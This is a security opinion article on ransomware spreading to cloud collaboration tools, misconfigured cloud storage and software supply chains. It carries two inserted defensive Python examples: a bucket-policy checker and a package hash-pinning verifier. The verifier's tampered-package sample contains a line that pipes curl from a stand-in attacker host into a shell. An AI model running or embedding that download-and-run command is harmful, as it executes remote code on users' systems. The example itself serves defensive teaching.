Ransomware Shifting to the Cloud

In the last few years, ransomware attacks have grown considerably. With some 75% of organizations reporting an attack, it seems likely that we'll see a saturation point soon. And attackers have not been resting on their laurels. On the contrary, they have continued to evolve ransomware, which is already in its fourth generation.

Ransomware has evolved far beyond the simple concept of encrypting data for ransom. Today it involves multiple levels of extortion: businesses, and the individuals whose data was taken, are blackmailed with the threat that the data will be published or resold to others.

At the same time, we have seen ransomware groups conduct richer analyses of the data they take, which highlights one key point businesses should be cognizant of: ransomware will increasingly lie dormant for a period. That dwell time is needed to move laterally, gather data across your networks and analyze it silently. The scope has extended from your data files to all data. For example, we now often see ransomware operators grab credentials that allow further access, can be sold back into the cybercrime ecosystem, or can be leveraged to extract a bigger ransom.

It may be that it's not just the volume of ransomware that is reaching saturation but also its capabilities. Many ransomware attacks no longer deserve that name, as they are much broader. They warrant a new name, such as blended ransomware or cyber data crimes.

However, the scope of our IT world continues to change rapidly, opening up new areas for attackers to saturate. Previously, such attacks moved laterally across your network. With most organizations now leveraging cloud-based collaboration tools such as Office 365, G-Suite, or Slack, it's natural that the adversaries follow.

We are already seeing ransomware that scans for cloud-based collaboration points. And while you may think the risks are the same, that's not the case. In most organizations, credential management has taken a step backward, as not every SaaS tool slots neatly into your single sign-on process; the result is standalone accounts, and often standalone passwords, that sit outside the controls you rely on for your core identities. Likewise, shadow cloud IT is making it tougher for security teams to keep track of what they have to protect.

At the same time, cloud-based SaaS resources are a double-edged sword. On the one hand, it is not always clear who owns the problem and the solution, the supplier or the end customer. On the other hand, evolving capabilities create headaches for security teams, which must understand each new capability's risks and decide whether they want to leverage it. Each new feature arrives either on or off by default, seemingly arbitrarily, so the security team must be quick to validate whether that default is the right decision for them. The risk profile is ever-evolving; if you aren't keeping pace, you can be sure the adversaries are.

It's not just SaaS. We see adversaries investigating what data stores you have, both with the typical cloud providers and with some of the other key systems integrators (SIs) and hosting providers. What we have seen to date is that, in our rush to the cloud, cloud configurations are typically not as mature or as secure as our historical on-prem data stores. We simply don't have the experience in an inherently more open and complex space.

The question of who is responsible for which parts of security may sound simple, but in reality, applying the answer is complex. Under the shared responsibility model, the cloud provider secures the underlying infrastructure, but you secure your data and applications, and that includes the configuration, identities and access controls around them. In recent years, we've seen the introduction of bring-your-own encryption keys precisely so that only business staff, and not the cloud provider, can access the data (with the caveat that a key generated on-prem but uploaded into the provider's key management service still rests on that provider's controls). The bottom line is that the cloud is far more complex, which allows for a greater degree of security errors and new opportunities for the adversary.
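To make the "maturity of cloud configurations" point concrete, here is an added example (not code from the original article) that checks a storage bucket policy for the most common error: an Allow statement that grants access to every caller. The two policies are constructed to mirror the AWS S3 bucket-policy JSON format; the bucket name and the account ID 111122223333 are placeholders, not real resources.

```python
"""Flag cloud storage bucket policies that grant access to anyone.

Added example, not code from the original article. The policies below are
constructed in the AWS S3 bucket-policy JSON format with placeholder names.
"""
import json

# Constructed: the kind of policy that appears in a rushed migration.
WEAK_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "PublicRead",
            "Effect": "Allow",
            "Principal": "*",
            "Action": ["s3:GetObject", "s3:ListBucket"],
            "Resource": ["arn:aws:s3:::example-backups",
                         "arn:aws:s3:::example-backups/*"],
        }
    ],
})

# Constructed: the same bucket, restricted to one role in the customer's own
# (hypothetical) account, plus a deny for plaintext HTTP access.
HARDENED_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "BackupRoleRead",
            "Effect": "Allow",
            "Principal": {"AWS": "arn:aws:iam::111122223333:role/backup-reader"},
            "Action": ["s3:GetObject"],
            "Resource": ["arn:aws:s3:::example-backups/*"],
        },
        {
            "Sid": "DenyInsecureTransport",
            "Effect": "Deny",
            "Principal": "*",
            "Action": "s3:*",
            "Resource": ["arn:aws:s3:::example-backups",
                         "arn:aws:s3:::example-backups/*"],
            "Condition": {"Bool": {"aws:SecureTransport": "false"}},
        },
    ],
})


def _is_anonymous(principal) -> bool:
    """True when the Principal element matches every caller (anonymous access)."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        aws = principal.get("AWS")
        values = aws if isinstance(aws, list) else [aws]
        return "*" in values
    return False


def public_statements(policy_json: str) -> list:
    """Return the Sids of Allow statements granting unconditional anonymous access.

    A Deny with Principal "*" is a guard rail, not an exposure, so it is ignored.
    An anonymous Allow that carries a Condition (source IP, VPC endpoint, ...)
    is scoped and still deserves review, but it is not blanket public access,
    so it is not reported here.
    """
    policy = json.loads(policy_json)
    statements = policy.get("Statement", [])
    if isinstance(statements, dict):  # a single statement may be unwrapped
        statements = [statements]
    findings = []
    for i, stmt in enumerate(statements):
        if stmt.get("Effect") != "Allow":
            continue
        if not _is_anonymous(stmt.get("Principal")):
            continue
        if stmt.get("Condition"):
            continue
        findings.append(stmt.get("Sid", f"statement[{i}]"))
    return findings


if __name__ == "__main__":
    print("weak:", public_statements(WEAK_POLICY))          # ['PublicRead']
    print("hardened:", public_statements(HARDENED_POLICY))  # []
```

A check like this belongs in the pipeline that creates the bucket, not in an annual audit; the whole point of the surrounding paragraphs is that the resource may exist for months before anyone looks at it.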

While we are used to the risks introduced by cloud vulnerabilities and misconfigurations, we are less used to the pace of change in the cloud. Be it shadow IT, DevOps teams, or one of the many other possibilities, cloud IT can be extremely dynamic. Can you apply the correct security controls to a resource if you don't know it's there? Many organizations feel the pain of limitless IT in the cloud only when the usage bills arrive, and only then do they start to validate what's required and what simply was never removed after a project was completed.

I would also be remiss if I didn't mention the supply chain in this discussion of ransomware's evolution. The complexity continues to grow as the world embraces DevOps and agile development pipelines. It's not just about who owns which responsibilities at which level but also about where things came from. For example, which libraries are being leveraged? We have seen open source code repositories, such as GitHub, host low-quality or malicious source code. When your development teams or your suppliers' development teams re-use code, you need to verify the integrity of that code, pinning what was reviewed and checking what is pulled against it, to ensure you aren't embedding a back door for the adversaries to leverage. As the very notion of DevOps is continual development, this becomes an ongoing task, a pace that security teams haven't been used to.
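The integrity check described above, as an added example that is not part of the original article: every downloaded artifact is compared against a digest pinned when the dependency was reviewed, and anything unpinned or altered fails the build. The lock file and the package bytes are constructed inline so the script runs offline; in practice the digests come from a committed lock file (pip's --require-hashes mode, npm's package-lock.json and Go's go.sum all carry per-artifact hashes) and the bytes from the archive the build actually fetched.

```python
"""Verify third-party package artifacts against pinned SHA-256 digests.

Added example, not code from the original article. The lock file and the
package bytes are constructed inline so the script runs offline.
"""
import hashlib
import hmac

NOT_PINNED = "not pinned in lock file"
DIGEST_MISMATCH = "digest does not match lock file"
OK = "digest matches lock file"

# Constructed: the archive bytes as they looked when the dependency was reviewed.
GOOD_LIB = b"def add(a, b):\n    return a + b\n"
# Constructed: the same artifact after someone republished it with a payload.
TAMPERED_LIB = (b"def add(a, b):\n"
                b"    __import__('os').system('curl http://attacker.invalid | sh')\n"
                b"    return a + b\n")


def sha256_hex(data: bytes) -> str:
    """SHA-256 of an artifact as lowercase hex, the form lock files use."""
    return hashlib.sha256(data).hexdigest()


# Constructed lock file: artifact filename -> digest pinned at review time.
# It is computed here from the known-good bytes so the example is self-contained;
# a real lock file is committed to the repo and changes only through review.
LOCK = {"libmath-1.0.0.tar.gz": sha256_hex(GOOD_LIB)}


def verify_artifact(name: str, data: bytes, lock: dict) -> tuple:
    """Return (accepted, reason) for one downloaded artifact.

    Anything absent from the lock file is rejected outright: an unpinned
    dependency is exactly the gap a malicious or typosquatted package slips
    through. The digest comparison uses a constant-time function out of habit;
    digests are not secret, but it costs nothing.
    """
    pinned = lock.get(name)
    if pinned is None:
        return False, NOT_PINNED
    if not hmac.compare_digest(sha256_hex(data), pinned):
        return False, DIGEST_MISMATCH
    return True, OK


def verify_all(artifacts: dict, lock: dict) -> dict:
    """Check every downloaded artifact; the build should fail if any is rejected."""
    return {name: verify_artifact(name, data, lock)
            for name, data in artifacts.items()}


if __name__ == "__main__":
    # Constructed download set: one tampered artifact and one never reviewed.
    downloads = {
        "libmath-1.0.0.tar.gz": TAMPERED_LIB,
        "leftpad-9.9.9.tar.gz": GOOD_LIB,
    }
    for name, (accepted, reason) in verify_all(downloads, LOCK).items():
        print(f"{'ACCEPT' if accepted else 'REJECT'} {name}: {reason}")
    print(verify_artifact("libmath-1.0.0.tar.gz", GOOD_LIB, LOCK))  # (True, OK)
```

Hash pinning only proves that the bytes match what was pinned; it does not make the reviewed code safe, and it covers transitive dependencies only if they are pinned too. That is why the paragraph above calls this an ongoing task: every dependency bump is a new review, not just a new digest.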

Spanning across all of these areas is understanding where your data is. In the run-up to the European General Data Protection Regulation (GDPR) and other data privacy regulations worldwide, companies invested a lot of time and energy to identify where sensitive data was and who had access to it. The rapid adoption of the cloud has pushed many backward, with data becoming more fragmented and scattered across a growing array of services.

This creates a challenge on both sides. On the one hand, it's now easier than ever to hold multiple copies of the same data, so recovering data after an attack can become less of a challenge. On the other hand, I suspect we will see the next evolution of ransomware focus more on extortion and resale than on publishing the sensitive data it has obtained, and every extra copy is another place that data can be taken from. The challenge for each business will be to keep track of where data is and who or what resources can access it.

I wish I could say that we have gone through the peak of ransomware attacks, but what is clear is that adversaries have continually adapted their attacks to increase revenue opportunities and cash in on evolving security weak points. Our journey to the cloud is still in its relative infancy. While it improves data resilience against traditional encrypt-and-ransom attacks, its scale, scope, and complexity create many new threats for security teams to manage and risks for every business to comprehend.

It is critical that we go in with open eyes and accept that we will make mistakes, but learn and adapt quickly. This way, we can be honest about where we stand and focus on the key risk areas.

I remain curious whether we will keep calling ransomware by the same name. My concern is the false confidence it can build: through time and investment we believe we have solved the problem we know, while the broader business can be blissfully unaware of just how far the threat has evolved and changed. Like the chameleon, ransomware continues to adapt to its environment.

Greg Day
About the Author

Greg Day is a Vice President and Global Field CISO for Cybereason in EMEA. Prior to joining Cybereason, Greg held CSO and CTO positions with Palo Alto Networks, FireEye and Symantec. A respected thought leader and long-time advocate for stronger, more proactive cybersecurity, Greg has helped many law enforcement agencies improve detection of cybercriminal behavior. In addition, he previously taught malware forensics to agencies around the world and has worked in advisory capacities for the Council of Europe on cybercrime and the UK National Crime Agency. He currently serves on the Europol cyber security industry advisory board.